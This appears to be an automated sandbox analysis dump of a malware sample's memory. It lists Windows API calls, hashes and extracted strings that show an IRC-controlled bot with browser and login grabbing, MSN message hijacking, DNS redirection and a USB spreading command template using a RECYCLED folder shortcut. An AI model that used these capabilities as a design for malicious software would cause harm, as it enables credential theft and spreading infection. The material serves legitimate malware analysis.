                                                                  • memset.MSVCRT(?,00000000,000003FF,?,00000000,000003FF), ref: 003DB002
                                                                  • lstrlenA.KERNEL32(?), ref: 003DB013
                                                                  • sscanf.MSVCRT(00000000,POST /%1023s,00000000,00000000,?,00000000), ref: 003DB02A
                                                                  • strtok.MSVCRT(00000000,003E2B84), ref: 003DB041
                                                                  • _memicmp.MSVCRT(00000000,Host: ,00000006), ref: 003DB05B
                                                                  • strtok.MSVCRT(00000000,003E2B84), ref: 003DB06E
                                                                  • lstrlenA.KERNEL32(-00000006), ref: 003DB082
                                                                  • lstrcpynA.KERNEL32(00000000,-00000006,00000001), ref: 003DB08E
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003DB09B
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003DB0AD
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003DB0BB
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003DB0C6
                                                                  • HeapAlloc.KERNEL32(?,00000000,?), ref: 003DB0D5
                                                                  • _memicmp.MSVCRT(00000000,HTTP,00000004), ref: 003DB0EB
                                                                  • _snprintf.MSVCRT(00000000,?,http://%s/,00000000), ref: 003DB106
                                                                  • _snprintf.MSVCRT(00000000,?,http://%s/%s,00000000,00000000), ref: 003DB125
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 003DB13C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$Heap$Alloc_memicmp_snprintfmemsetstrtok$Freelstrcpynsscanf
                                                                  • String ID: HTTP$Host: $POST /%1023s$http://%s/$http://%s/%s
                                                                  • API String ID: 3179755921-1264106924
                                                                  • Opcode ID: e4060a9ab81de6a378e2218679331c00fb608ed9bd7fb405b652eb89cb595b98
                                                                  • Instruction ID: 0c19122b79039c13f67a8b5ca9807d4892702dc055ad58ffc406c7087314fcd4
                                                                  • Opcode Fuzzy Hash: e4060a9ab81de6a378e2218679331c00fb608ed9bd7fb405b652eb89cb595b98
                                                                  • Instruction Fuzzy Hash: 144119B3D40268A7D726A7A19C42FEB736CDF84710F054690FB08A6281E7B09E458BE1
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,00000103), ref: 003D6A68
                                                                  • lstrlenA.KERNEL32 ref: 003D6B03
                                                                  • _memicmp.MSVCRT(?,00000000,00000000), ref: 003D6B0E
                                                                  • _memicmp.MSVCRT(?,JOIN,00000004), ref: 003D6B22
                                                                  • _memicmp.MSVCRT(?,PRIVMSG,00000007), ref: 003D6B36
                                                                  • sscanf.MSVCRT(?,JOIN %255s,?), ref: 003D6B4F
                                                                  • sscanf.MSVCRT(?,PRIVMSG %255s,?), ref: 003D6B69
                                                                  • lstrlenA.KERNEL32(?), ref: 003D6BD5
                                                                  • SetFileAttributesW.KERNEL32(0041A710,00000080), ref: 003D6C31
                                                                  • MoveFileExW.KERNEL32(0041A710,00000000,00000004), ref: 003D6C40
                                                                  • closesocket.WS2_32(?), ref: 003D6C60
                                                                  • ExitThread.KERNEL32 ref: 003D6C67
                                                                    • Part of subcall function 003DA310: memset.MSVCRT ref: 003DA335
                                                                    • Part of subcall function 003DA310: memset.MSVCRT ref: 003DA34F
                                                                    • Part of subcall function 003DA310: memset.MSVCRT(?,00000000,000003FF), ref: 003DA369
                                                                    • Part of subcall function 003DA310: _vsnprintf.MSVCRT(?,000003FE,003E0A8E,000001FE,?,00000000,000003FF), ref: 003DA382
                                                                    • Part of subcall function 003DA310: sprintf.MSVCRT(00000000,003E13EC,?,?,000003FE,003E0A8E,000001FE,?,00000000,000003FF), ref: 003DA39A
                                                                    • Part of subcall function 003DA310: lstrlenA.KERNEL32(30e44aa1,?,?,00000000,000003FF,?,00000000,756F59EB,?,003D74EB,%s.%s,blk,?,?,000001FE,003E0A8E), ref: 003DA3AD
                                                                    • Part of subcall function 003DA310: _snprintf.MSVCRT(?,000003FF,\\.\pipe\%08x_ipc,00000000,30e44aa1,00000000,?,?,00000000,000003FF,?,00000000,756F59EB,?,003D74EB,%s.%s), ref: 003DA3CC
                                                                    • Part of subcall function 003DA310: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000,756F59EB,?,003D74EB), ref: 003DA3DB
                                                                    • Part of subcall function 003DA310: sprintf.MSVCRT(?,%d.,00000000,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000,756F59EB), ref: 003DA3EC
                                                                    • Part of subcall function 003DA310: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000), ref: 003DA3FB
                                                                    • Part of subcall function 003DA310: lstrlenA.KERNEL32(30e44aa1,?,?,?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000), ref: 003DA404
                                                                    • Part of subcall function 003DA310: EnterCriticalSection.KERNEL32(0041AC34,?,?,00000000), ref: 003DA436
                                                                    • Part of subcall function 003DA310: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000003,00000000,00000000), ref: 003DA452
                                                                    • Part of subcall function 003DA310: LeaveCriticalSection.KERNEL32(0041AC34,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 003DA464
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$memset$File_memicmp$CriticalSectionsprintfsscanf$AttributesCreateEnterExitLeaveMoveThread_snprintf_vsnprintfclosesocket
                                                                  • String ID: %s.Detected process "%S" sending an IRC packet to server %s:%d (Target: %s).$%s.Detected process "%S" sending an IRC packet to server %s:%d.$%s:%d$JOIN$JOIN %255s$PRIVMSG$PRIVMSG %255s$block$cnc$pdef
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,00000103,00000000,00000000,00000000), ref: 003E0071
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00000000), ref: 003E0080
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003E00AB
                                                                  • HeapAlloc.KERNEL32(00000000,00000008,00000001), ref: 003E00B6
                                                                  • lstrcpyA.KERNEL32(00000000,00000000), ref: 003E00CB
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003E00D2
                                                                  • HeapAlloc.KERNEL32(00000000,00000008,00000001), ref: 003E00E3
                                                                  • strtok.MSVCRT(00000000,003E2B84), ref: 003E00F9
                                                                  • strstr.MSVCRT(00000000,003E19DC), ref: 003E0117
                                                                  • strstr.MSVCRT(00000000,003E2B54), ref: 003E0129
                                                                  • lstrcatA.KERNEL32(00000000,003E2B84), ref: 003E0141
                                                                  • _memicmp.MSVCRT(00000000,Content-Length: ,00000010), ref: 003E014E
                                                                  • lstrcatA.KERNEL32(00000000,Content-Length: ), ref: 003E0160
                                                                  • _snprintf.MSVCRT(00000000,00000103,003E2B10,00000000), ref: 003E0177
                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 003E018A
                                                                  • strtok.MSVCRT(00000000,003E2B84), ref: 003E0193
                                                                  • lstrcatA.KERNEL32(00000000,), ref: 003E01AB
                                                                  • lstrcatA.KERNEL32(00000000,00000000), ref: 003E01B2
                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 003E01BE
                                                                  Similarity
                                                                  • API ID: lstrcat$Heap$Alloclstrlenstrstrstrtok$FreeProcess_memicmp_snprintflstrcpymemset
                                                                  • String ID: $Content-Length:
                                                                  APIs
                                                                  • memset.MSVCRT ref: 003DA335
                                                                  • memset.MSVCRT ref: 003DA34F
                                                                  • memset.MSVCRT(?,00000000,000003FF), ref: 003DA369
                                                                  • _vsnprintf.MSVCRT(?,000003FE,003E0A8E,000001FE,?,00000000,000003FF), ref: 003DA382
                                                                  • sprintf.MSVCRT(00000000,003E13EC,?,?,000003FE,003E0A8E,000001FE,?,00000000,000003FF), ref: 003DA39A
                                                                  • lstrlenA.KERNEL32(30e44aa1,?,?,00000000,000003FF,?,00000000,756F59EB,?,003D74EB,%s.%s,blk,?,?,000001FE,003E0A8E), ref: 003DA3AD
                                                                  • _snprintf.MSVCRT(?,000003FF,\\.\pipe\%08x_ipc,00000000,30e44aa1,00000000,?,?,00000000,000003FF,?,00000000,756F59EB,?,003D74EB,%s.%s), ref: 003DA3CC
                                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000,756F59EB,?,003D74EB), ref: 003DA3DB
                                                                  • sprintf.MSVCRT(?,%d.,00000000,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000,756F59EB), ref: 003DA3EC
                                                                  • lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000), ref: 003DA3FB
                                                                  • lstrlenA.KERNEL32(30e44aa1,?,?,?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000), ref: 003DA404
                                                                  • EnterCriticalSection.KERNEL32(0041AC34,?,?,00000000), ref: 003DA436
                                                                  • CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000003,00000000,00000000), ref: 003DA452
                                                                  • LeaveCriticalSection.KERNEL32(0041AC34,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 003DA464
                                                                  • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 003DA484
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 003DA48B
                                                                  • Sleep.KERNEL32(000001F4,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 003DA496
                                                                  • LeaveCriticalSection.KERNEL32(0041AC34,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 003DA4A1
                                                                  Similarity
                                                                  • API ID: lstrlen$CriticalSectionmemset$FileLeavesprintf$CloseCreateEnterHandleSleepWrite_snprintf_vsnprintf
                                                                  • String ID: %d.$30e44aa1$\\.\pipe\%08x_ipc
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,000001FF,00000000,00000000,00000000), ref: 003E0202
                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,00000000), ref: 003E0213
                                                                  • EnterCriticalSection.KERNEL32(0041B4E4), ref: 003E0223
                                                                  • strstr.MSVCRT(00000000,003E19DC), ref: 003E0243
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003E0254
                                                                  • HeapAlloc.KERNEL32(00000000,00000008,00000001), ref: 003E025F
                                                                  • lstrcpyA.KERNEL32(00000000,00000000), ref: 003E0272
                                                                  • strstr.MSVCRT(00000000,), ref: 003E0281
                                                                  • _snprintf.MSVCRT(00000000,000001FF,%s=,003E32E4), ref: 003E02C8
                                                                  • strstr.MSVCRT(?,00000000), ref: 003E02EF
                                                                  • atoi.MSVCRT(00000000,?,http,int), ref: 003E0322
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003E0386
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 003E03E4
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 003E03EE
                                                                  • LeaveCriticalSection.KERNEL32(0041B4E4), ref: 003E03FD
                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 003E041F
                                                                  Similarity
                                                                  • API ID: Heap$Freestrstr$CriticalSectionlstrlen$AllocEnterLeaveProcess_snprintfatoilstrcpymemset
                                                                  • String ID: $%s.%s hijacked!$%s=$http$httpi$httpspread$int$msg
                                                                  APIs
                                                                  Similarity
                                                                  • API ID: strstrstrtok$lstrcmplstrlen
                                                                  • String ID: W>$001$332$376$433$JOIN$KCIK %s$MOTD$PING$PPNG %s$PPPPMSG$SEND %s %s
                                                                  APIs
                                                                  • lstrlenA.KERNEL32(?,00000000,00000000,00000000,?,?,003D7CC2,00000000,003E2914,?,?,?,?,?,?), ref: 003DAE11
                                                                  • HeapAlloc.KERNEL32(?,00000008,00000001,?,003D7CC2,00000000,003E2914,?,?,?,?,?,?,?,00000000), ref: 003DAE23
                                                                  • HeapAlloc.KERNEL32(?,00000008,-00000002,?,?,?,?,?,?,00000000), ref: 003DAE41
                                                                  • strstr.MSVCRT(?,003E19DC), ref: 003DAE59
                                                                  • lstrcpyA.KERNEL32(00000000,?), ref: 003DAE70
                                                                  • lstrcpyA.KERNEL32(00000000,?), ref: 003DAE77
                                                                  • lstrcatA.KERNEL32(00000000,003E2B54), ref: 003DAE7F
                                                                  • strtok.MSVCRT(00000000,003E19DC), ref: 003DAE8E
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003DAEA1
                                                                  • _strnicmp.MSVCRT(00000000,00000000,00000000), ref: 003DAEA6
                                                                  • strtok.MSVCRT(00000000,003E19DC), ref: 003DAEB9
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 003DAED5
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 003DAEEB
                                                                  • strstr.MSVCRT(00000000,003E2B54), ref: 003DAF10
                                                                  • lstrlenA.KERNEL32(00000001), ref: 003DAF20
                                                                  • lstrlenA.KERNEL32(00000001), ref: 003DAF27
                                                                  • ??2@YAPAXI@Z.MSVCRT(00000001), ref: 003DAF2B
                                                                  • lstrlenA.KERNEL32(00000001), ref: 003DAF3D
                                                                  • lstrcpyA.KERNEL32(?,00000001), ref: 003DAF58
                                                                  • lstrlenA.KERNEL32(00000001,?,00000001), ref: 003DAF5F
                                                                  • lstrlenA.KERNEL32(00000001,?,00000001), ref: 003DAF6B
                                                                  • HeapFree.KERNEL32(?,00000000,00000000,?,00000001), ref: 003DAF82
                                                                  • HeapFree.KERNEL32(?,00000000,00000000,?,00000001), ref: 003DAF91
                                                                  Similarity
                                                                  • API ID: lstrlen$Heap$Free$lstrcpy$Allocstrstrstrtok$??2@_strnicmplstrcat
                                                                  • String ID:
                                                                  APIs
                                                                  • strstr.MSVCRT(00000000,003E19DC,00000000,00000000), ref: 003D7C62
                                                                  • _stricmp.MSVCRT(?,cPanel,blog,%s-%s-%s,?,?,00000000), ref: 003D7D58
                                                                  • _stricmp.MSVCRT(00000000,WHM), ref: 003D7D71
                                                                  • _stricmp.MSVCRT(?,WHCMS), ref: 003D7D8A
                                                                  • _stricmp.MSVCRT(?,Directadmin), ref: 003D7DA3
                                                                    • Part of subcall function 003DA310: memset.MSVCRT ref: 003DA335
                                                                    • Part of subcall function 003DA310: memset.MSVCRT ref: 003DA34F
                                                                    • Part of subcall function 003DA310: memset.MSVCRT(?,00000000,000003FF), ref: 003DA369
                                                                    • Part of subcall function 003DA310: _vsnprintf.MSVCRT(?,000003FE,003E0A8E,000001FE,?,00000000,000003FF), ref: 003DA382
                                                                    • Part of subcall function 003DA310: sprintf.MSVCRT(00000000,003E13EC,?,?,000003FE,003E0A8E,000001FE,?,00000000,000003FF), ref: 003DA39A
                                                                    • Part of subcall function 003DA310: lstrlenA.KERNEL32(30e44aa1,?,?,00000000,000003FF,?,00000000,756F59EB,?,003D74EB,%s.%s,blk,?,?,000001FE,003E0A8E), ref: 003DA3AD
                                                                    • Part of subcall function 003DA310: _snprintf.MSVCRT(?,000003FF,\\.\pipe\%08x_ipc,00000000,30e44aa1,00000000,?,?,00000000,000003FF,?,00000000,756F59EB,?,003D74EB,%s.%s), ref: 003DA3CC
                                                                    • Part of subcall function 003DA310: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000,756F59EB,?,003D74EB), ref: 003DA3DB
                                                                    • Part of subcall function 003DA310: sprintf.MSVCRT(?,%d.,00000000,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000,756F59EB), ref: 003DA3EC
                                                                    • Part of subcall function 003DA310: lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000), ref: 003DA3FB
                                                                    • Part of subcall function 003DA310: lstrlenA.KERNEL32(30e44aa1,?,?,?,?,?,?,?,?,?,?,?,00000000,000003FF,?,00000000), ref: 003DA404
                                                                    • Part of subcall function 003DA310: EnterCriticalSection.KERNEL32(0041AC34,?,?,00000000), ref: 003DA436
                                                                    • Part of subcall function 003DA310: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000003,00000000,00000000), ref: 003DA452
                                                                    • Part of subcall function 003DA310: LeaveCriticalSection.KERNEL32(0041AC34,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 003DA464
                                                                  • ??3@YAXPAX@Z.MSVCRT(?,?,00000000), ref: 003D7E02
                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000,?,00000000), ref: 003D7E12
                                                                    • Part of subcall function 003D73E0: memset.MSVCRT(?,00000000,000001FF), ref: 003D7401
                                                                    • Part of subcall function 003D73E0: memset.MSVCRT(?,00000000,000001FF,?,00000000,000001FF), ref: 003D7419
                                                                    • Part of subcall function 003D73E0: lstrlenA.KERNEL32(?), ref: 003D7431
                                                                    • Part of subcall function 003D73E0: _snprintf.MSVCRT(?,000001FE,%s_,?), ref: 003D7449
                                                                    • Part of subcall function 003D73E0: _vsnprintf.MSVCRT(?,000001FE,003E0A8E,?), ref: 003D746B
                                                                    • Part of subcall function 003D73E0: lstrlenA.KERNEL32(?), ref: 003D747A
                                                                    • Part of subcall function 003D7330: memset.MSVCRT(?,00000000,000001FF), ref: 003D7351
                                                                    • Part of subcall function 003D7330: lstrlenA.KERNEL32(?), ref: 003D7369
                                                                    • Part of subcall function 003D7330: _snprintf.MSVCRT(00000000,000001FE,%s_,?), ref: 003D7381
                                                                    • Part of subcall function 003D7330: _vsnprintf.MSVCRT(00000000,000001FE,003E0AAD,?), ref: 003D73A3
                                                                    • Part of subcall function 003D7330: lstrlenA.KERNEL32(00000000), ref: 003D73B2
                                                                  Similarity
                                                                  • API ID: lstrlen$memset$_stricmp$_snprintf_vsnprintf$??3@CriticalSectionsprintf$CreateEnterFileLeavestrstr
                                                                  • String ID: %s-%s-%s$%s.%s ->> %s (%s : %s)$%s.%s ->> %s : %s$4)>$Directadmin$WHCMS$WHM$blog$cPanel$ffgrab$httplogin$iegrab
                                                                  APIs
                                                                  • sscanf.MSVCRT(?,CAL %d %256s,?,003E7008), ref: 003D260F
                                                                    • Part of subcall function 003E07D0: lstrlenA.KERNEL32(*&=,?,?,00000000,?,003D262A,?,003E7008), ref: 003E07DC
                                                                    • Part of subcall function 003E07D0: lstrcpyA.KERNEL32(00000000,*&=,?,003E7008), ref: 003E07F9
                                                                  • strstr.MSVCRT(?,X-MMS-IM-Format:), ref: 003D264F
                                                                    • Part of subcall function 003D7700: memset.MSVCRT(?,00000000,000001FF), ref: 003D771E
                                                                    • Part of subcall function 003D7700: _snprintf.MSVCRT(00000000,000001FF,state_%s,?,?,00000000,000001FF), ref: 003D7738
                                                                    • Part of subcall function 003D7700: lstrlenA.KERNEL32(00000000), ref: 003D7747
                                                                  • atoi.MSVCRT(00000000), ref: 003D26FB
                                                                  • atoi.MSVCRT(00000000), ref: 003D2713
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003D276B
                                                                  • lstrlenA.KERNEL32(00000000,00000000), ref: 003D278C
                                                                  • HeapFree.KERNEL32(?,00000000,00000000), ref: 003D27F9
                                                                  Similarity
                                                                  • API ID: lstrlen$atoi$FreeHeap_snprintflstrcpymemsetsscanfstrstr
                                                                  • String ID: %s.p10-> Message hijacked!$%s.p10-> Message to %s hijacked!$%s.p21-> Message hijacked!$CAL $CAL %d %256s$MSG $MSG $SDG $X-MMS-IM-Format:$baddr$msn$msnint$msnmsg$msnu
                                                                  APIs
                                                                  • GetFileAttributesA.KERNEL32(?), ref: 003DEFF4
                                                                  • memset.MSVCRT ref: 003DF011
                                                                  • memset.MSVCRT(?,00000000,000007FF), ref: 003DF02B
                                                                  • PathFindExtensionA.SHLWAPI(?,.lnk), ref: 003DF039
                                                                  • lstrcmpA.KERNEL32(00000000), ref: 003DF046
                                                                  • lstrcmpA.KERNEL32(?,003E13D8), ref: 003DF056
                                                                  • lstrcmpA.KERNEL32(?,003E2FCC), ref: 003DF066
                                                                  • lstrcmpA.KERNEL32(?,RECYCLED), ref: 003DF08F
                                                                  • strrchr.MSVCRT(?,0000005C), ref: 003DF09C
                                                                  • strrchr.MSVCRT(?,0000005C,?,0000005C), ref: 003DF0A9
                                                                  • _snprintf.MSVCRT(?,000007FF,/c "start %%cd%%RECYCLED\%s,00000001), ref: 003DF0CC
                                                                  • _snprintf.MSVCRT(?,000007FF,&&%%windir%%\explorer.exe %%cd%%%s,00000001,?,000007FF,/c "start %%cd%%RECYCLED\%s,00000001), ref: 003DF0E4
                                                                  • SetFileAttributesA.KERNEL32(?,00000006), ref: 003DF109
                                                                  Similarity
                                                                  • API ID: lstrcmp$AttributesFile_snprintfmemsetstrrchr$ExtensionFindPath
                                                                  • String ID: %windir%\system32\cmd.exe$&&%%windir%%\explorer.exe %%cd%%%s$.lnk$/c "start %%cd%%RECYCLED\%s$RECYCLED
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,00000103), ref: 003DE5B0
                                                                  • EnterCriticalSection.KERNEL32(0041B3C8), ref: 003DE5C9
                                                                  • strtok.MSVCRT(?,003E2B84), ref: 003DE5FE
                                                                  • strstr.MSVCRT(00000000,003E13D8), ref: 003DE617
                                                                  • strstr.MSVCRT(00000000,003E2C78), ref: 003DE62D
                                                                  • strstr.MSVCRT(00000000,003E13D8), ref: 003DE642
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003DE655
                                                                  • lstrlenA.KERNEL32(00000000), ref: 003DE65B
                                                                  • lstrcpyA.KERNEL32(00000000,003E1335), ref: 003DE678
                                                                  • lstrcpynA.KERNEL32(00000000,00000000,00000000), ref: 003DE687
                                                                    • Part of subcall function 003D7500: lstrlenA.KERNEL32(?), ref: 003D752B
                                                                    • Part of subcall function 003D7500: _snprintf.MSVCRT(?,000001FF,%s_,?), ref: 003D7547
                                                                    • Part of subcall function 003D7500: _vsnprintf.MSVCRT(?,000001FF,00000000,?), ref: 003D7569
                                                                    • Part of subcall function 003D7500: lstrcmpA.KERNEL32(?,bdns), ref: 003D758B
                                                                    • Part of subcall function 003D7500: StrStrIA.SHLWAPI(?,00000000), ref: 003D759F
                                                                    • Part of subcall function 003D7500: lstrlenA.KERNEL32(?), ref: 003D75B9
                                                                  • strtok.MSVCRT(00000000,003E2B84), ref: 003DE6CF
                                                                  • HeapFree.KERNEL32(?,00000000,?), ref: 003DE71E
                                                                  • ??3@YAXPAX@Z.MSVCRT(?), ref: 003DE72D
                                                                  • LeaveCriticalSection.KERNEL32(0041B3C8), ref: 003DE73A
                                                                    • Part of subcall function 003DAA10: memset.MSVCRT(?,00000000,00000103), ref: 003DAA31
                                                                    • Part of subcall function 003DAA10: lstrcpyA.KERNEL32(00000000,Mozilla/4.0), ref: 003DAA45
                                                                    • Part of subcall function 003DAA10: InternetOpenA.WININET(00000000,?,?,?,?), ref: 003DAA60
                                                                    • Part of subcall function 003DAA10: lstrlenA.KERNEL32(?), ref: 003DAA78
                                                                    • Part of subcall function 003DAA10: InternetOpenUrlA.WININET(?,?,?,00000000,04000000,00000000), ref: 003DAA8C
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: lstrlen$strstr$CriticalInternetOpenSectionlstrcpymemsetstrtok$??3@EnterFreeHeapLeave_snprintf_vsnprintflstrcmplstrcpyn
                                                                  • String ID: [DNS]: Blocked %d domain(s) - Redirected %d domain(s)$bdns$block
                                                                  • API String ID: 1940452476-536441337
                                                                  • Opcode ID: b03e4564b27957440a23433b9a5810ff8857fd0800ef8b604f262e5b2515a938
                                                                  • Instruction ID: 6348a63dd90e52ecb5363f48e68823f91cd7050f5e7251bb03177809b142191f
                                                                  • Opcode Fuzzy Hash: b03e4564b27957440a23433b9a5810ff8857fd0800ef8b604f262e5b2515a938
                                                                  • Instruction Fuzzy Hash: D2411B76D003687BC723A7A5AC82DFF7B7CDB90700F140256F905AA281E6B09E4086A1
                                                                  APIs
                                                                  • GetFileAttributesW.KERNEL32(?), ref: 003D12BE
                                                                  • wcsstr.MSVCRT(?,003E1378), ref: 003D12FD
                                                                  • wcsstr.MSVCRT(?,\\.\pipe), ref: 003D1313
                                                                  • wcsstr.MSVCRT(?,DBWIN), ref: 003D1325
                                                                  • SetFileAttributesW.KERNEL32(?,00000080), ref: 003D1368
                                                                  • MoveFileExW.KERNEL32(?,00000000,00000004), ref: 003D1373
                                                                  • ExitThread.KERNEL32 ref: 003D1416
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: Filewcsstr$Attributes$ExitMoveThread
                                                                  • String ID: %s.%S$DBWIN$\\.\pipe$brk$dll$exe$ruskill
                                                                  • API String ID: 294512176-1976196219
                                                                  • Opcode ID: ccd532b7e903d9985cda4314a222243ea7bd3489420203ad3157ecad1ca8e662
                                                                  • Instruction ID: 37c829ea428e5220feaddb97e5d2eb9938f591637ea7ac3bd8e603ee44bce6ae
                                                                  • Opcode Fuzzy Hash: ccd532b7e903d9985cda4314a222243ea7bd3489420203ad3157ecad1ca8e662
                                                                  • Instruction Fuzzy Hash: 7841FF7A600255BBDB239F52BC86FDF336CEB58351F05022AF904963C0EB70AD4086A2
                                                                  APIs
                                                                  • GetProcessHeap.KERNEL32(00000008,00000208), ref: 003DB312
                                                                  • HeapAlloc.KERNEL32(00000000), ref: 003DB319
                                                                  • memset.MSVCRT(?,00000000,00000206), ref: 003DB339
                                                                  • memset.MSVCRT(?,00000000,00000206,?,00000000,00000206), ref: 003DB354
                                                                  • GetWindowsDirectoryW.KERNEL32(?,00000208), ref: 003DB387
                                                                  • lstrcpynW.KERNEL32(?,?,00000004), ref: 003DB3A1
                                                                  • GetVolumeInformationW.KERNEL32(?,00000000,00000000,?,00000000,00000000,00000000,00000000), ref: 003DB3BB
                                                                  • lstrlenA.KERNEL32(30e44aa1), ref: 003DB3D8
                                                                  • lstrlenA.KERNEL32(30e44aa1), ref: 003DB3F0
                                                                  • lstrcatW.KERNEL32(00000000,.exe), ref: 003DB461
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: Heaplstrlenmemset$AllocDirectoryInformationProcessVolumeWindowslstrcatlstrcpyn
                                                                  • String ID: .exe$30e44aa1$lol$lol.exe
                                                                  • API String ID: 1748614950-52295467
                                                                  • Opcode ID: 129d5ab4e021da50ecc962b97d80529d177d10a18fbddd3d37e5878c9279055d
                                                                  • Instruction ID: d2c403bfb5887a3dc3afc68f331ec836dcbe6c9f2a87c841abfaac419e325696
                                                                  • Opcode Fuzzy Hash: 129d5ab4e021da50ecc962b97d80529d177d10a18fbddd3d37e5878c9279055d
                                                                  • Instruction Fuzzy Hash: 7B415BB1601364E6C721CB66DC45AEFFBBDEF84311F0082A6F518D6291E7B88E40D7A5
                                                                  APIs
                                                                  • memset.MSVCRT(?,00000000,00000103), ref: 003DAA31
                                                                  • lstrcpyA.KERNEL32(00000000,Mozilla/4.0), ref: 003DAA45
                                                                  • InternetOpenA.WININET(00000000,?,?,?,?), ref: 003DAA60
                                                                  • lstrlenA.KERNEL32(?), ref: 003DAA78
                                                                  • InternetOpenUrlA.WININET(?,?,?,00000000,04000000,00000000), ref: 003DAA8C
                                                                  • HttpQueryInfoA.WININET(?,20000013,?,?,00000000), ref: 003DAAC0
                                                                  • InternetQueryDataAvailable.WININET(00000000,?,00000000,00000000), ref: 003DAAE2
                                                                  • ??2@YAPAXI@Z.MSVCRT(00001000), ref: 003DAB15
                                                                  • InternetReadFile.WININET(00000000,?,00000FF8,00000001), ref: 003DAB67
                                                                  • ??2@YAPAXI@Z.MSVCRT(?), ref: 003DAB85
                                                                  • ??3@YAXPAX@Z.MSVCRT(00000000), ref: 003DABA5
                                                                  • InternetCloseHandle.WININET(00000000), ref: 003DABE7
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000009.00000002.621221554.00000000003D0000.00000040.00000400.00020000.00000000.sdmp, Offset: 003D0000, based on PE: true
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_9_2_3d0000_QgGhoOpxHPl.jbxd
                                                                  Similarity
                                                                  • API ID: Internet$??2@OpenQuery$??3@AvailableCloseDataFileHandleHttpInfoReadlstrcpylstrlenmemset
                                                                  • String ID: Mozilla/4.0
                                                                  • API String ID: 2392773942-2634101963
                                                                  • Opcode ID: 2ed69a3993d2c152394e42fa77ab4c94001d30c3665b2c2998835b9ce7c447a5
                                                                  • Instruction ID: 05a42c4d6388cb9cf98d000b8daeae0dee4b3463d7a332369121fb76ec500742
